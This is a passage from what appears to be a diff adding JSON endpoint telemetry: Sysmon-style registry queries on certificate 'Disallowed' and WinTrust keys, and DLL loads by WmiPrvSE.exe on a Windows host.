"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": 
"{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncobjapi.dll", + "image_path": "C:\\Windows\\System32\\ncobjapi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573488860000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wbemsvc.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", + "pid": 4036, + "process_name": 
"WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "wmiutils.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPerfInst.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfInst.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
